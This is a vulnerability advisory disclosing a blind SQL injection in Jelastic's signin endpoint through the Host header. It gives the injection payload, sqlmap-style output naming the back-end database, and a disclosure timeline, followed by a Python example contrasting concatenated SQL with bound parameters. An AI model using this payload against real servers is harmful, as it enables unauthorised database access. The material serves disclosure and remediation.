Jelastic 4.4 SQL injection

2018.10.13
Procode701 (IT)
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Jelastic 5.4 and earlier versions
# Exploit Author: https://twitter.com/Procode701
# Dork: N/A
# Date: 2018-10-13
# Vendor Homepage: https://jelastic.com/
# Software Link: https://jelastic.com/
# Version: 5.4
# Category: Webapps
# CVE: N/A

# POC:
########################################################

The application /1.0/users/authentication/rest/signin is vulnerable to SQL injection.

Vulnerable application Header field:

Host: xxxxx.jelastic.com' AND 8494=8494-- ttWV

EXPLOIT POC :

Parameter: Host #1* ((custom) HEADER)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: app.demo.jelastic.com' AND 8494=8494-- ttWV
---
[21:35:21] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5 (MariaDB fork)
[21:35:21] [INFO] fetching tables for database: 'hivet_jeeas'
[21:35:21] [INFO] fetching number of tables for database 'hivet_jeeas'

PAYLOAD: ' AND 8494=8494-- ttWV

########################################################

Disclosure Timeline
=============================
Vendor Notification: June 5, 2018 (vendor did not respond)
Notification to Telecom Italia "TIM Digital Store": June 5, 2018 (Telecom Italia sec team managed the vulnerability with the Jelastic development team).
Vendor released the fix in version 5.5
October 13, 2018: Public Disclosure
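The root cause the advisory describes, a Host header reaching a WHERE clause as SQL text, is shown here beside the hardened form. This is an added example, not Jelastic's code or the author's: the `tenants` table, the function names and the use of SQLite in place of MySQL/MariaDB are assumptions.

```python
import re
import sqlite3

# RFC 1123 style hostname labels with an optional :port. Anything else is rejected.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
HOST_RE = re.compile(rf"{_LABEL}(?:\.{_LABEL})*(?::\d{{1,5}})?")

def make_db():
    """Constructed schema: hypothetical table mapping hostnames to tenant ids."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE tenants (id INTEGER PRIMARY KEY, hostname TEXT UNIQUE)")
    db.execute("INSERT INTO tenants (hostname) VALUES ('app.demo.jelastic.com')")
    return db

def lookup_concat(db, host):
    """'Before' form: the header value becomes part of the SQL text."""
    return db.execute(
        "SELECT id FROM tenants WHERE hostname = '" + host + "'").fetchall()

def lookup_bound(db, host):
    """Hardened form: the header is a bound parameter and is only ever data."""
    return db.execute(
        "SELECT id FROM tenants WHERE hostname = ?", (host,)).fetchall()

def valid_host(host):
    """Syntax check applied before the value reaches any backend code."""
    return len(host) <= 259 and HOST_RE.fullmatch(host) is not None

def resolve_tenant(db, host):
    """Validate, normalise, then look up with a bound parameter.
    Returns the tenant id, or None if the header is rejected or unknown."""
    if not valid_host(host):
        return None
    rows = lookup_bound(db, host.split(":")[0].lower())
    return rows[0][0] if rows else None

if __name__ == "__main__":
    db = make_db()
    # Host value quoted in the advisory above.
    header = "app.demo.jelastic.com' AND 8494=8494-- ttWV"
    print("concatenated:", lookup_concat(db, header))  # condition is parsed as SQL
    print("bound       :", lookup_bound(db, header))   # no hostname equals the string
    print("valid_host  :", valid_host(header))
    print("resolve     :", resolve_tenant(db, "App.Demo.Jelastic.com:8443"))
```

Binding the parameter is the fix for the injection itself; the hostname check is a second layer that also gives a clean signal to log when a malformed Host header arrives.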

